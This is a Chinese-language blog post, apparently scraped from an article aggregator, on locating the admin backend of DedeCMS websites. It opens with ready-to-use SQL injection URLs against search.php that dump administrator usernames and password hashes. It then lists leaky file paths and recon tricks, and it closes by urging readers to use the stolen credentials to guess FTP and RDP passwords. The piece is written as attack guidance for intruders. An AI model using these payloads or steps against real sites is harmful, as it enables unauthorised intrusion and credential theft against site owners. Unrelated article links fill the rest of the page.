dedecms站找后台的一些经验

首先:

注入exp

有时候 有些 /plus/目录换成了 /plugins目录

/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

/plus/search.php?keyword=as&typeArr[ uNion ]=a

/robots.txt

/data/admin/ver.txt

/data/mysql_error_trace.inc

第一 个看这里 /data/mysql_error_trace.inc 爆出来补 

第二 个  域名作为后台 或者域名变形一下

第三 个 先ping域名 获得ip地址 之后 

http://www.bing.com/

搜索 ip:127.0.0.1  php 有可能获得后台 也可以获得其他旁注站 一般dedecms的旁站很多也是dedecms 的  

第四 个  查看 robots.txt

http://www.dedecms.com/robots.txt  查看旁注站dedecms的站  再去社工目标站的后台地址也可以

第五 个  注入exp得到账号 去社工 ftp 和 3389密码 

更多相关文章
  •  貌似很纠结,今天去暗组转了一圈,看到某牛发的一个帖子,是一找后台的大黑阔去非你莫属找工作的视频,看完以后我凌乱了,艹,这个黑阔真心S+B,你们看视频吧,http://static.video.qq.com/TPout.swf?vid=h001295l7ee&auto=1第一,我觉的他的记忆 ...
  •      国庆放假后我和我们班的几个同学就来到长沙.开始了我们找工作的历程,因为我们全都是从学校刚出来,社会阅历不足,到了这个让我们几个觉得陌生的城市,人生地不熟真的是不知该从何从着手,我们都只知道唯一的途径那就是人才招聘会,     我现在来长沙十多天了,找了几天的工作,体会到了现在社会上的竞争是 ...
  • 当老板问你是否要休息时,多半他是不希望你休息的. 你的第一份工作非常重要,不要轻易跳草,等你做满一年以上时,你会清楚你是否真的需要跳跳. 工作2-3年后,一定要弄清自己的职业方向在哪里.不然你会越走越迷惘. 定了职业方向你一定要坚持走下去,不要轻言放弃.要知道,无论哪个行业,只要你选对了方向,只要你 ...
  • 求百科 apache+php+mysql 在cenos32位安装完后搭建dedeCMS网站后台验证码不显示环境:apache2.2.22 php 5.2.17 mysql 5.1.37 编译安装完后所apache的安装:#./configure --prefix=/usr/local/apache ...
  • 一.网站策划书:为什么要制作网站?网站提供什么内容?设计什么样的风格适合网站?站点制作步骤布局及模块分析技术支持及培训安排推广方案二.网站策划都做什么?1.进行市场调查(根据网站定位进行的市场调查,方式:网络.现实填表.)2.确定网站规模(大型站点.小型站点还是中型站点)3.确定网站的类别及设计特色 ...
  • 上周有幸通过了某知名IT公司的笔试,获得了一次难得的面试经历,说句实在话,可能我参加的面试还不如很多学弟学妹参加的多,一方面是因为学校这边的要求比较严,很难获得实习的机会,另一方面也是我自己的问题,在这方面不算主动,导致到现在还没有真正的实习过一次,想想就觉得是人生一大遗憾啊(此处略去360个字), ...
  • 19种 网站入侵方法1.经典注入通常,判断一个网站是否存在注入点,可以用’,and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,来判断,如果and 1=1正常返回页面,1=2错误,或者找不到,那么就存在注入点2.万能密码OR漏洞万 ...
  • 首先把,主站入手注册一个账号,看下上传点,等等之类的.用google找***入点,格式是Site:XXX.com inurl:asp|php|aspx|jsp最好不要带 www,因为不带的话可以检测二级域名.扫目录,看编辑器和Fckeditor,看下敏感目录,有没有目录遍及,查下是iis6,iis5 ...
一周排行
  • 利用ADMT进行Exchange跨域迁移之一:配置域信任
    前言:前段时间完对某公司AD.Exchange的跨域迁移,现将环境重新模拟一次,并将操作过 ...
  • 灰度发布,简单来说,就是根据各种条件,让一部分用户使用旧版本,另一部分用户使用新版本.nginx 的语法本身可以看作是一门小型的编程语言,通过简单的编程,可以轻松实现基于IP的灰度发布.需求:搭建准生产环境,供开发人 ...
  • Test.py文件内容:# coding=utf-8 import os dd=range(1,5) for j in dd:     print j1.方法一     $ python Test.py2.方法二换一 ...
  •     这是我第一次写博客,不知道该写些什么,就解释一下我博客的标题吧.在人生这条路上,我知道,最重要的一点,就是自信,它能阻止你的颓废.如果你有目标,你就要实现它,永远相信自己能够做到,就是这样,没有其他.    ...
  • 类关系说明:类的关系有泛化(Generalization).实现(Realization).依赖(Dependency)和关联(Association).其中关联又分为一般关联关系和聚合关系(Aggregation) ...
  • 网络工程师突击一
    2013年网络工程综合知识试题知识点分布2009年1月国家软考办发布了<网络工程师考 ...
  • 集群和负载均衡的概念集群(Cluster) 所谓集群是指一组独立的计算机系统构成的一个松耦合的多处理器系统,它们之间通过网络实现进程间的通信.应用程序可以通过网络共享内存进行消息传送,实现分布式计算机.负载均衡(Lo ...
  • 7个顶级的HTML5Canvas动画赏析
    HTML5确实是一项改革浏览器乃至整个软件行业的新技术,它可以帮助我们Web开发者很方便地 ...
  • 置顶文章:<纯CSS打造银色MacBook Air(完整版)> 上一篇:<两个简单的Loading> 下一篇:<JavaScript实现Ajax小结> 置顶文章:<纯CSS打 ...
  • 在winform中有一个控件可以显示html的内容,该控件就是webbrowser,设置它的DocumenText属性为HTML的内容即可. 在使用WebBrowser做UI的时候,我们有时不希望里面的链接被用户点击 ...